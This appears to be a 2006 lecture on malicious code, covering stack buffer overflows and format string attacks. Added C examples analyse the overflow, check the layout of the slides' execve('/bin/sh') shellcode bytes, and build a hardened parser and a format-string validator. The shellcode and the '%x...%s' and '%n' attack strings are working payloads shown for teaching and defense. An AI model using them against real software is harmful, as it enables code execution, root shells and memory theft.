Malicious Code for Fun and Profit
Mihai Christodorescu
mihai@cs.wisc.edu
23 March 2006
What is Malicious Code?
Viruses, worms, trojans, ... Code that breaks your security policy.
Characteristics:
• Attack vector
• Payload
• Spreading algorithm
Outline
• Attack Vectors
• Payloads
• Spreading Algorithms
• Case Studies
Attack Vectors
• Social engineering: "Make them want to run it."
• Vulnerability exploitation: "Force your way into the system."
• Piggybacking: "Make it run when other programs run."
Social Engineering
• Suggest to the user that the executable is:
  – A game.
  – A desirable picture/movie.
  – An important document.
  – A security update from Microsoft.
  – A security update from the IT department.
• Spoofing the sender helps.
Outline
• Attack Vectors: Social Engineering, Vulnerability Exploitation, Piggybacking
• Payloads
• Spreading Algorithms
• Case Studies
Vulnerability Exploitation
• Make use of flaws in software input handling.
• Sample techniques:
  – Buffer overflow attacks.
  – Format string attacks.
  – Return-to-libc attacks.
  – SQL injection attacks.
Buffer Overflows: Basic Principles
A buffer overflow occurs when data is written past the boundaries of an array or a string. The additional data overwrites nearby program variables (and, on the stack, saved control data such as the return address).
Result: the attacker controls or takes over a currently running process.
Buffer Overflows: Example
Expected input: \\hostname\path

    void process_request(char *req)
    {
        // Get hostname
        char host[20];
        int pos = find_char(req, '\\', 2);
        strcpy(host, substr(req, 2, pos - 1));
        ...
        return;
    }

    process_request("\\\\tux12\\usr\\foo.txt");            /* \\tux12\usr\foo.txt            => OK  */
    process_request("\\\\aaabbbcccdddeeefffggghhh\\bar");  /* \\aaabbbcccdddeeefffggghhh\bar => BAD */
Buffer Overflows: Program Stack
A stack frame per procedure call: main() calls process_request(), which calls strcpy(). The frame of process_request(), from higher to lower addresses:

    arg: req
    return address
    frame pointer (saved)
    local: host[20]
    local: pos
Buffer Overflows: Normal Execution

    process_request("\\\\tux12\\usr\\foo.txt");   /* \\tux12\usr\foo.txt */

find_char() locates the second backslash at index 7, so pos = 7. strcpy() writes "tux12" plus the terminating NUL (6 bytes) into host[20]; the saved frame pointer and the return address are untouched.
Buffer Overflows: Overflow Execution

    process_request("\\\\aaabbbcccdddeeefffggghhhiiijjj\\bar");   /* \\aaabbbcccdddeeefffggghhhiiijjj\bar */

The closing backslash is at index 32, so pos = 32 and strcpy() copies the 30-character "hostname" plus its NUL (31 bytes) into host[20]. Reading upward through the frame:
• "aaabbbcccdddeeefffgg" fills host[20].
• "ghhh" overwrites the saved frame pointer.
• "iiij" overwrites the return address (the characters the attacker cares about).
• "jj" and the NUL land above the return address, in the caller's part of the frame.
Buffer Overflows: Smashing the Stack
The attacker gets one chance to gain control. Craft an input string such that:
• The return address is overwritten with a pointer to malicious code.
• The malicious code is placed inside the input string itself.
Malicious code can create a shell by executing "/bin/sh"; if the victim process runs as root, that is a root shell.
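The following is an added example, not code from the slides. It reimplements the slide's process_request() parsing with an assumed find_char() (index of the first occurrence of a character at or after a start index), computes safely how many bytes the unchecked strcpy() would write and which input bytes would land on the saved frame pointer and the return address under the frame layout shown above (host[20], then a 4-byte saved frame pointer, then a 4-byte return address), and shows a bounds-checked replacement. The two request strings are the slide's own; nothing here performs the overflow.

```c
/* Added example (not from the slides): analysis of the slide's overflow and a
 * bounds-checked parser. find_char() is the slide's helper with assumed semantics. */
#include <stdio.h>
#include <string.h>

#define HOST_LEN 20   /* char host[20] in the slide */

/* Assumed semantics of the slide's find_char(): index of the first 'c' in s
 * at or after index 'from', or -1 if there is none. */
static int find_char(const char *s, char c, int from)
{
    for (int i = from; s[i] != '\0'; i++)
        if (s[i] == c)
            return i;
    return -1;
}

/* Number of bytes strcpy(host, substr(req, 2, pos - 1)) writes, NUL included. */
static int hostname_copy_len(const char *req)
{
    int pos = find_char(req, '\\', 2);
    if (pos < 0)
        pos = (int)strlen(req);        /* no closing backslash: copies to the end */
    return pos - 2 + 1;
}

/* Frame layout from the slide, lowest address first:
 * host[20] | saved frame pointer (4 bytes) | return address (4 bytes). */
struct frame_effect {
    int  overflow_bytes;   /* bytes written past host[HOST_LEN]; 0 means no overflow */
    char saved_fp[5];      /* input bytes that land on the saved frame pointer */
    char ret_addr[5];      /* input bytes that land on the return address */
};

static struct frame_effect analyze_overflow(const char *req)
{
    struct frame_effect e = { 0, "", "" };
    int n = hostname_copy_len(req);    /* data bytes are req[2 .. 2+n-2], then a NUL */
    if (n > HOST_LEN)
        e.overflow_bytes = n - HOST_LEN;
    for (int i = 0; i < 4; i++) {
        int fp_off = HOST_LEN + i;       /* offsets 20..23 from host[0] */
        int ra_off = HOST_LEN + 4 + i;   /* offsets 24..27 from host[0] */
        if (fp_off < n - 1) e.saved_fp[i] = req[2 + fp_off];
        if (ra_off < n - 1) e.ret_addr[i] = req[2 + ra_off];
    }
    return e;
}

/* Bounds-checked replacement: copies the hostname only if it fits, else fails. */
static int parse_hostname_safe(const char *req, char *host, size_t hostlen)
{
    if (strncmp(req, "\\\\", 2) != 0)
        return -1;                                   /* must start with \\ */
    int pos = find_char(req, '\\', 2);
    size_t len = (pos < 0) ? strlen(req) - 2 : (size_t)(pos - 2);
    if (len == 0 || len >= hostlen)                  /* leave room for the NUL */
        return -1;
    memcpy(host, req + 2, len);
    host[len] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed inputs: the slide's OK request and its overflow request. */
    const char *inputs[] = {
        "\\\\tux12\\usr\\foo.txt",
        "\\\\aaabbbcccdddeeefffggghhhiiijjj\\bar",
    };
    char host[HOST_LEN];

    for (int k = 0; k < 2; k++) {
        struct frame_effect e = analyze_overflow(inputs[k]);
        printf("request %d: strcpy writes %d bytes into host[%d], overflow %d, "
               "saved fp <- \"%s\", return address <- \"%s\"\n",
               k, hostname_copy_len(inputs[k]), HOST_LEN, e.overflow_bytes,
               e.saved_fp, e.ret_addr);
        if (parse_hostname_safe(inputs[k], host, sizeof host) == 0)
            printf("  hardened parser: host = \"%s\"\n", host);
        else
            printf("  hardened parser: rejected\n");
    }
    return 0;
}
```

The analysis reports 11 bytes of overflow for the slide's attack string, with "ghhh" on the saved frame pointer and "iiij" on the return address, matching the diagram; the hardened parser accepts "tux12" and rejects the long hostname instead of copying it.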
Buffer Overflows: Shell Code
Code for exec("/bin/sh"):

    EB 17 5E 89 76 08 31 C0 88 46 07 89 46 0C B0 0B
    89 F3 8D 4E 08 31 D2 CD 80 E8 E4 FF FF FF
    "/bin/sh\0"  arg1 (pointer to "/bin/sh")  arg2 (NULL)  pointer to code

What the code does:

    mov edx, arg2        ; envp (NULL)
    mov ecx, arg1        ; argv
    mov ebx, "/bin/sh"   ; path
    mov eax, 0Bh         ; execve system call
    int 80h

The final pointer to the code is the value that overwrites the return address.
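An added example, not from the slides, that checks the properties a practitioner verifies before trusting shellcode like the one above: the bytes are the slide's, embedded as a constant and never executed. Because the payload travels through strcpy(), it must contain no NUL byte before the string; and the jmp/call pair must be self-consistent (the jmp lands on the call, the call lands back on the pop, and the address the call pushes is the start of "/bin/sh"). The decoders for the two relative branches are written here for the example.

```c
/* Added example (not from the slides): structural checks on the shellcode
 * bytes shown above. Nothing here is executed as code. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define CODE_LEN 30   /* bytes before the "/bin/sh" string */

/* The slide's bytes. The trailing NUL of "/bin/sh" is not carried in the
 * payload; the code writes it at run time via mov [esi+7], al. */
static const unsigned char shellcode[] = {
    0xEB, 0x17,                    /* jmp  +0x17          -> to the call below      */
    0x5E,                          /* pop  esi            esi = address of "/bin/sh" */
    0x89, 0x76, 0x08,              /* mov  [esi+8], esi   argv[0] = "/bin/sh"       */
    0x31, 0xC0,                    /* xor  eax, eax                                 */
    0x88, 0x46, 0x07,              /* mov  [esi+7], al    NUL-terminate the string  */
    0x89, 0x46, 0x0C,              /* mov  [esi+12], eax  argv[1] = NULL            */
    0xB0, 0x0B,                    /* mov  al, 11         execve                    */
    0x89, 0xF3,                    /* mov  ebx, esi       path                      */
    0x8D, 0x4E, 0x08,              /* lea  ecx, [esi+8]   argv                      */
    0x31, 0xD2,                    /* xor  edx, edx       envp = NULL               */
    0xCD, 0x80,                    /* int  0x80                                     */
    0xE8, 0xE4, 0xFF, 0xFF, 0xFF,  /* call -0x1c          -> back to the pop        */
    '/', 'b', 'i', 'n', '/', 's', 'h',
};

/* strcpy() stops at the first NUL, so the payload must not contain one. */
static int nul_free(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0)
            return 0;
    return 1;
}

/* Target offset of a short jump (EB rel8) located at offset 'at'. */
static int jmp_rel8_target(const unsigned char *p, int at)
{
    return at + 2 + (int8_t)p[at + 1];
}

/* Target offset of a relative call (E8 rel32, little-endian) located at 'at'. */
static int call_rel32_target(const unsigned char *p, int at)
{
    uint32_t u = (uint32_t)p[at + 1] | (uint32_t)p[at + 2] << 8 |
                 (uint32_t)p[at + 3] << 16 | (uint32_t)p[at + 4] << 24;
    int32_t rel = (int32_t)u;
    return at + 5 + rel;
}

/* 1 if the jmp/call trick is wired correctly and the payload is strcpy-safe. */
static int shellcode_layout_ok(void)
{
    int call_at = jmp_rel8_target(shellcode, 0);          /* where the jmp lands */
    if (shellcode[call_at] != 0xE8)
        return 0;                                          /* must land on the call */
    if (call_rel32_target(shellcode, call_at) != 2)
        return 0;                                          /* call must return to pop esi */
    if (shellcode[2] != 0x5E)
        return 0;
    int str_at = call_at + 5;                              /* the address the call pushes */
    if (str_at != CODE_LEN || memcmp(shellcode + str_at, "/bin/sh", 7) != 0)
        return 0;
    return nul_free(shellcode, sizeof shellcode);
}

int main(void)
{
    printf("payload bytes: %zu, NUL-free: %d\n", sizeof shellcode,
           nul_free(shellcode, sizeof shellcode));
    printf("jmp at 0 -> %d, call -> %d, string at %d\n",
           jmp_rel8_target(shellcode, 0),
           call_rel32_target(shellcode, jmp_rel8_target(shellcode, 0)),
           jmp_rel8_target(shellcode, 0) + 5);
    printf("layout ok: %d\n", shellcode_layout_ok());
    return 0;
}
```

The same checks catch the usual mistakes when shellcode is edited by hand: a changed instruction length that leaves the jmp short of the call, a call displacement that no longer points at the pop, or a zero byte that truncates the copy.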
Buffer Overflows: Thicker Armor
• Defenses against stack-smashing attacks:
  – Bounds-checking.
  – Protection libraries.
  – Non-executable stack.
  – setuid()/chroot().
  – Avoid running programs as root!
  – Address randomization.
  – Behavioral monitoring.
More Info
• "Smashing the Stack for Fun and Profit" by Aleph One
• StackGuard, RAD, PaX, ASLR
• CERT
Format String Attacks
• Another way to illegally control program values.
• Uses flaws in the design of printf(): the format string, not the call site, decides how many arguments are read from the stack and how each is interpreted.

    printf("%s: %d", s, x);
Format Strings: printf() Operation

    printf("%s: %d, %x", s, x, y);

Stack at the call, inside foo()'s frame (from higher to lower addresses): y, x, s, format string pointer; then the frame of printf(). Each conversion in the format string consumes the next argument slot upward on the stack.
Format Strings: Attack 1: Read Any Value
What the code says:

    printf(str);

What the programmer meant:

    printf("%s", str);

If str = "%s", printf() takes the next stack slot as a char pointer and prints whatever it points to. With str = "%x%x%x%x%x%x%x%x%s" the eight %x conversions print and skip eight stack slots and the %s dereferences the ninth, for example a pointer to a secret key, so the attacker reads memory of their choosing.
Format Strings: Attack 2: Write to Address
What the code says:

    printf(str);

If str = "%n", printf() stores the number of characters written so far through the pointer taken from the next stack slot. With str = "%x%x%x%x%x%x%x%x%n" the eight %x conversions skip eight stack slots and the %n writes through the ninth, for example into the saved return address, so the attacker overwrites memory of their choosing.
Format Strings: Defenses
Never pass user data to printf() as the format string! Use printf("%s", str) instead of printf(str).
FormatGuard.
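An added example, not from the slides, that demonstrates the two attacks above and the defense in well-defined C. The printf() argument area is stood in for by explicit arguments to snprintf() (three scratch values and then a pointer to a constructed secret), so a user-controlled format string walks them exactly as the slides describe without reading undefined memory; the %n demonstration writes through a legitimate local pointer to show how padding controls the value. The scan_format() validator is a simple check written for this example, not FormatGuard.

```c
/* Added example (not from the slides): simulated format string attacks and a
 * validator for untrusted strings. All names here are the example's own. */
#include <stdio.h>
#include <string.h>

static const char *secret_key = "S3CR3T";   /* constructed stand-in for a secret in memory */

/* Attack 1, simulated. The bug: user_fmt is used as the format string. The
 * arguments play the stack slots that printf() would walk: three values, then
 * a pointer to the secret. "%x%x%x%s" skips three slots and prints the secret. */
static int render_unsafe(char *out, size_t outlen, const char *user_fmt)
{
    return snprintf(out, outlen, user_fmt, 0x11, 0x22, 0x33, secret_key);
}

/* The intended code: user data is an argument, never the format string. */
static int render_safe(char *out, size_t outlen, const char *user_str)
{
    return snprintf(out, outlen, "%s", user_str);
}

/* Attack 2, mechanism only: %n stores the count of characters emitted so far
 * through the next pointer argument. Padding an earlier conversion (here a
 * width of 'padding' on one %x) lets the attacker choose the stored value.
 * The pointer here is a local; in the attack it comes from a hijacked slot. */
static int value_written_by_n(int padding)
{
    int written = -1;
    char buf[1024];                          /* %n counts even what snprintf truncates */
    snprintf(buf, sizeof buf, "%*x%n", padding, 0xbeef, &written);
    return written;
}

/* Defense check: count conversion directives in untrusted text. Any %n is a
 * write primitive; any other conversion reads a stack slot. "%%" is harmless. */
struct fmt_scan { int conversions; int writes; };

static struct fmt_scan scan_format(const char *s)
{
    struct fmt_scan r = { 0, 0 };
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') { p++; continue; }  /* escaped percent sign */
        const char *q = p + 1;               /* skip flags, width, precision, length */
        while (*q && strchr("-+ #0123456789.*hlLqjzt", *q))
            q++;
        if (*q == '\0')
            break;                           /* dangling '%' at end of string */
        r.conversions++;
        if (*q == 'n')
            r.writes++;
        p = q;
    }
    return r;
}

int main(void)
{
    char buf[64];
    const char *attacks[] = { "%x%x%x%s", "%x%x%x%x%x%x%x%x%n", "100%% done" };

    render_unsafe(buf, sizeof buf, attacks[0]);
    printf("unsafe printf(str) with \"%s\" -> \"%s\"\n", attacks[0], buf);
    render_safe(buf, sizeof buf, attacks[0]);
    printf("safe printf(\"%%s\", str)        -> \"%s\"\n", buf);
    printf("%%n after 512 characters of padding stores %d\n", value_written_by_n(512));

    for (int i = 0; i < 3; i++) {
        struct fmt_scan r = scan_format(attacks[i]);
        printf("scan \"%s\": %d conversions, %d writes -> %s\n", attacks[i],
               r.conversions, r.writes, r.conversions ? "REJECT" : "ok");
    }
    return 0;
}
```

Only the first attack string is ever handed to render_unsafe(): the "%n" string is shown to the validator, not to the unsafe call, because with a hijacked slot it would write through an arbitrary pointer. The validator is a last line of defense for logging and message paths that must accept arbitrary text; the actual fix is the one on the slide, keeping user data out of the format argument entirely.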